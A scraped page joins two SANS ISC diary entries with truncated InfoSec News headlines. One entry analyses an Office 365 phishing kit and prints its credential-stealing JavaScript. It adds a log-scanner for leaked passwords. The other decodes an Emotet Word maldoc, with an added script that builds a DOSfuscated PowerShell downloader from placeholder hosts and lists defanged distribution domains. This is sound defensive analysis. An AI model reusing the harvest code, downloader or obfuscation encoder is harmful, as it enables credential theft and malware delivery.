Here is a nice example of a phishing attack that I found while reviewing data captured by my honeypots. We all know that phishing is a pain, and attackers are always searching for new tactics to entice the potential victim into clicking a link, disclosing personal information, or more…

This time, the email mimics an NDR ("Non-Delivery Report") from Microsoft Office 365. Here is a genuine one (grabbed as is from Google Images):


You have probably already received this kind of notification, and with Office 365 being so popular, the chances increase daily. Now, let's have a look at the fake one:

Note also the interesting sender email address; that inspires extra trust, doesn't it?

If you click the link to resend the mail, guess what? The bad guy asks you to enter the password for the email address passed as an argument in the URL:

Here is the piece of code called when you submit the form:

function sendmails() {
  var em = $('#testx').val();   // the email field (pre-filled with the address passed in the URL)
  var ps = $('#pass').val();    // the password typed by the victim
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var response = JSON.parse(this.responseText);
      if (response.msg == "donesend") {
        // back end accepted the credentials: show a "thanks" message, then send the victim to the real Outlook
        $(".login_form").hide();
        $(".thanks").show(); setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000);
      } else {
        // anything else: a generic error, so the victim simply tries again
        $("#warning").empty();
        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
      }
    }
  };
  // credentials leave the browser unencoded, in the query string of a GET request to the kit's back end
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true);
  xhttp.send();
}

It is based on XMLHttpRequest[1], which lets the browser query another page without reloading the current one. Depending on what sendx.php returns, you get either the warning message or a redirect to the official Outlook home page. Note that the credentials travel as GET query-string parameters, so every harvested email address and password also ends up in the phishing server's access log (and in any proxy log between the victim and the server). My guess is that the PHP code tries to validate the credentials against a Microsoft service.

[1] https://www.w3schools.com/xml/xml_http.asp
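Because the kit submits user and pass in the query string, the harvested credentials are visible in any web server or proxy log that saw the request. The script below is an added example (not part of the original diary): it scans constructed Apache-style access-log lines for GET requests that carry both an account and a password parameter, which is what you would run against a seized kit's access log or your own proxy logs to list the accounts that need a password reset. The endpoint name sendx.php and the user/pass parameter names come from the kit's JavaScript; the other parameter names, IP addresses, accounts and passwords are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names that usually carry an account name or a password. "user" and "pass"
# are what the kit's JavaScript uses; the other names are assumed common variants.
USER_KEYS = {"user", "username", "email", "login", "em"}
PASSWORD_KEYS = {"pass", "password", "passwd", "pwd", "ps"}

# One Apache/nginx "combined" access-log line; the fields after the status are ignored.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def credentials_in_url(target):
    """Return (account, password, path) when the query string carries both an
    account and a password parameter, otherwise None. parse_qs URL-decodes the
    values, so victim%40example.com comes back as victim@example.com."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    accounts = [v for k, vs in params.items() if k.lower() in USER_KEYS for v in vs]
    passwords = [v for k, vs in params.items() if k.lower() in PASSWORD_KEYS for v in vs]
    if not accounts or not passwords:
        return None
    return accounts[0], passwords[0], parts.path


def harvested_credentials(log_lines):
    """Scan access-log lines for GET requests that leak credentials in the URL.
    POST bodies are never written to the access log, so only query-string
    submissions (like the kit's sendx.php call) are visible this way."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        found = credentials_in_url(m["target"])
        if found is None:
            continue
        account, password, path = found
        hits.append({
            "src": m["src"],
            "when": m["when"],
            "endpoint": path,
            "account": account,
            # keep the secret itself out of the report; its length is enough to spot junk input
            "password_len": len(password),
            "status": int(m["status"]),
        })
    return hits


# Constructed log lines (no real traffic): one kit submission with the e-mail URL-encoded,
# an ordinary page view, a second kit using other parameter names, and a POST whose
# body cannot be inspected from the log.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2018:09:14:02 +0000] "GET /sendx.php?user=victim%40example.com&pass=Winter2018 HTTP/1.1" 200 31 "http://phish.example/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2018:09:14:07 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2018:09:20:11 +0000] "GET /login/?email=bob@example.org&password=s3cret HTTP/1.1" 302 0 "-" "curl/7.61"',
    '198.51.100.4 - - [10/Dec/2018:09:21:00 +0000] "POST /sendx.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in harvested_credentials(SAMPLE_LOG):
        print(f'{hit["when"]} {hit["src"]} -> {hit["endpoint"]} account={hit["account"]}')
```

The same scan works on outbound proxy logs: a hit on an external host with both parameters present is a user who has just typed a password into a phishing form, which is the trigger for a forced reset and a session revocation. A kit that switches to POST leaves no such trace in the access log, so this check complements, rather than replaces, inspection of the kit's own storage.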

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reader Vince asked for help with the analysis of a malicious Word document. He started the analysis himself, following the method I illustrated in diary entry "Word maldoc: yet another place to hide a command".
Following this method, Vince found a shell statement:

He then searched for the string zOSpqpzMSfs but could not find the PowerShell command.

In the diary entry Vince followed, I search for a VBA string, that is, a string delimited with double quotes: "j9tmrnmi". That works because the VBA string identifies an object, and the object can be found in the streams of the OLE file.
The string zOSpqpzMSfs that Vince is searching for is actually a VBA variable name, not a VBA string. The value of this variable is calculated at run time and is not stored explicitly as an object property:

That is why the method Vince followed does not work for this sample. You need to find the value of the variable, for example by reverse engineering the VBA statements and calculating the value accordingly.

But there is also a "quick-and-dirty" method that I illustrated in the diary entry "Quickie: String Analysis is Still Useful": just search for long strings (printable character sequences) in the document file, regardless of the internal file structure.
This works for Vince's sample (here I grep for cmd to keep the output short):


What we have here is a PowerShell command obfuscated with a DOSfuscation technique.

This command-line statement selects characters from the string in red using indices in yellow:

to build the following command:

I used Python to do the indexing and concatenation to decode the PowerShell command:


And this PowerShell command is a downloader: a command that downloads and executes a malicious executable.

Notice that this downloader tries 5 URLs:

wpthemes[.]com
tom-steed[.]com
bobvr[.]com
alexzstroy[.]ru
herbliebermancommunityleadershipaward[.]org

to download an Emotet variant.
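To make the chain above concrete, here is an added example (my own code, not Didier Stevens' tools and not the actual sample from this diary): a strings-style extraction that ignores the file structure, the "grep cmd" filter, a decoder for the FORcode-style DOSfuscation statement (a character set stored in a variable, a list of indices, and one character pulled per index with !VAR:~%i,1!), and extraction of the download URLs from the decoded PowerShell, defanged with [.] as in the list above. The document bytes, the obfuscated statement (variable names zOS and fin), and the URLs in it are all constructed here; the real sample's character string and indices are in the screenshots and are not reproduced.

```python
"""Recover a FORcode-obfuscated command from a document and list its download URLs.

Added example: not Didier Stevens' tools and not the real sample from the diary.
The document bytes, the obfuscated statement (variables zOS/fin) and the URLs are
constructed here so that the script runs offline.
"""
import random
import re


# ---- 1. quick-and-dirty: printable ASCII runs, regardless of file structure ----
def extract_strings(data, min_len=8):
    """Same idea as the strings command: every run of >= min_len printable bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def grep(strings, keyword):
    """Case-insensitive filter, like piping strings output through grep -i."""
    return [s for s in strings if keyword.lower() in s.lower()]


# ---- 2. FORcode: pick characters from a char set using a list of indices ----
def decode_forcode(statement):
    """Decode   set S=<chars>&&FOR %q IN (i1 i2 ...) DO set F=!F!!S:~%q,1!
    by taking chars[i] for every index i, in order."""
    m_set = re.search(r"set\s+(?P<name>\w+)=(?P<chars>[^&]*)", statement, re.I)
    m_for = re.search(r"for\s+%%?(?P<var>\w)\s+in\s*\((?P<idx>[^)]*)\)", statement, re.I)
    if not (m_set and m_for):
        raise ValueError("no 'set NAME=...' / 'FOR %x IN (...)' pair in statement")
    name, chars, var = m_set["name"], m_set["chars"], m_for["var"]
    # The loop body must take exactly one character per index (!NAME:~%x,1!);
    # anything else means the indices are used differently and we must not guess.
    if not re.search(rf"!{re.escape(name)}:~%%?{var},1!", statement):
        raise ValueError(f"loop body does not index {name} one character at a time")
    indices = [int(i) for i in re.split(r"[\s,;=]+", m_for["idx"].strip()) if i]
    return "".join(chars[i] for i in indices)


# ---- 3. download locations from the decoded PowerShell, defanged like the list above ----
URL_RE = re.compile(r"https?://[^\s'\"@;)]+")


def defang(url):
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def download_urls(command):
    return [defang(u) for u in URL_RE.findall(command)]


def recover_downloader(doc):
    """strings -> grep cmd -> decode -> URLs: the whole chain from the diary."""
    candidates = grep(extract_strings(doc), "cmd")
    if len(candidates) != 1:
        raise ValueError(f"expected one cmd string, found {len(candidates)}")
    command = decode_forcode(candidates[0])
    return command, download_urls(command)


# ---- constructed sample (stands in for the real maldoc; nothing here is live) ----
def build_forcode(command, seed=2018):
    """Encoder used only to build the sample; real kits use Invoke-DOSfuscation."""
    for bad in '%&!"^<>|':
        if bad in command:
            raise ValueError(f"{bad!r} would need cmd escaping, not handled here")
    charset = list(dict.fromkeys(command)) + list("#QJK")   # unique chars plus decoys
    random.Random(seed).shuffle(charset)
    charset = "".join(charset)
    indices = " ".join(str(charset.index(c)) for c in command)
    last = indices.rsplit(" ", 1)[-1]
    return (f'cmd /V:ON/C"set zOS={charset}&&FOR %q IN ({indices}) DO set fin=!fin!!zOS:~%q,1!'
            f'&&IF %q=={last} CALL %fin:~-{len(command)}%"')


DOWNLOADER = (
    "powershell -nop -w hidden -c $u='http://a.example/x1/@http://b.example/x2/'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\z.exe');"
    "Start-Process ($env:TEMP+'\\z.exe');break}catch{}}"
)
JUNK = bytes(range(32)) * 4      # non-printable filler standing in for OLE structure
DOC = JUNK + b"Normal.dotm" + JUNK + b"Ab" + JUNK + build_forcode(DOWNLOADER).encode() + JUNK

if __name__ == "__main__":
    cmd, urls = recover_downloader(DOC)
    print(cmd)
    print("\n".join(urls))
```

The decoder refuses to guess when the loop body does not pull one character per index, since other DOSfuscation variants (substring reversal, character substitution) reuse the same set/FOR building blocks with different meaning; a real sample may also store the command in a stream with UTF-16 strings, in which case the extraction step needs a second pass over 2-byte characters, which this example does not do.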

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

 
phpMyAdmin CVE-2018-19968 Local File Include Vulnerability
 

Posted by InfoSec News on Dec 12

https://www.healthcareitnews.com/news/european-perspective-how-hospitals-should-be-approaching-gdpr-compliance

By Mike Miliard
Healthcare IT News
December 11, 2018

Since the European Union enacted its General Data Protection Regulation
law this past May, it's probable that many healthcare organizations in the
U.S. have been trying hard not to think much about it.

But most should be paying a lot more attention to the rules since, even if...
 

Posted by InfoSec News on Dec 12

https://www.cyberscoop.com/equifax-breach-report-house-oversight-committee/

By Sean Lyngaas
CYBERSCOOP
DEC 10, 2018

The devastating 2017 breach of credit-reporting company Equifax, which exposed
data on 148 million people, was "entirely preventable" had the company applied
proactive security measures, a congressional investigation has concluded.

"Had the company taken action to address its observable security issues prior
to...
 

Posted by InfoSec News on Dec 12

https://techcrunch.com/2018/12/11/supermicro-says-investigation-firm-found-no-spy-chips/

By Romain Dillet
Techcrunch.com
December 11, 2018

Supermicro has sent a letter to its customers saying that it has found no
evidence of malicious chips on its motherboards. The company asked
third-party company Nardello & Co. to audit Supermicro’s hardware.

On October 4, a Bloomberg report claimed that China's spies managed to
conceal tiny...
 

Posted by InfoSec News on Dec 12

https://www.wsj.com/articles/nsa-cyber-chief-says-companies-are-losing-ground-against-adversaries-11544548614

By Angus Loten
The Wall Street Journal
Dec. 11, 2018

NEW YORK -- Are we winning the war to protect data? Not according to Rob
Joyce, the National Security Agency's senior adviser on cybersecurity
strategy. Corporate leaders face increasing challenges in safeguarding
their online systems and data, he said.

"The trend is...
 

Posted by InfoSec News on Dec 12

https://www.dailynews.co.zw/articles/2018/12/11/govt-launches-cyber-security-booklet

By Pauline Hurungudo
Dailynews.co.zw
11 December 2018

HARARE - Information Technology, Postal and Courier services ministry, in
partnership with Econet, TelOne, Telecel, Greepys and ZITC have launched a
cyber-security booklet [1] and website to foster awareness and protection
from cyber-crime which has started to cripple many Zimbabweans,
particularly on...
 

Posted by InfoSec News on Dec 12

Forwarded from: THOTCON <info (at) thotcon.org>

This email contains important information regarding the THOTCON 0xA Call
for Papers. Please read it completely.

*** BEGIN THOTCON TRANSMISSION

Greetings:

We are sending this transmission to make sure you are fully aware of our
Call for Papers and Call for Villages. Both of these speaking and
participation opportunities will close on January 1st, 2019. 

Call for...
 

Posted by InfoSec News on Dec 12

https://www.nytimes.com/2018/12/11/us/politics/trump-china-trade.html

By David E. Sanger, Nicole Perlroth, Glenn Thrush and Alan Rappeport
The New York Times
Dec. 11, 2018

WASHINGTON -- The cyberattack on the Marriott hotel chain that collected
personal details of roughly 500 million guests was part of a Chinese
intelligence-gathering effort that also hacked health insurers and the
security clearance files of millions more Americans,...
 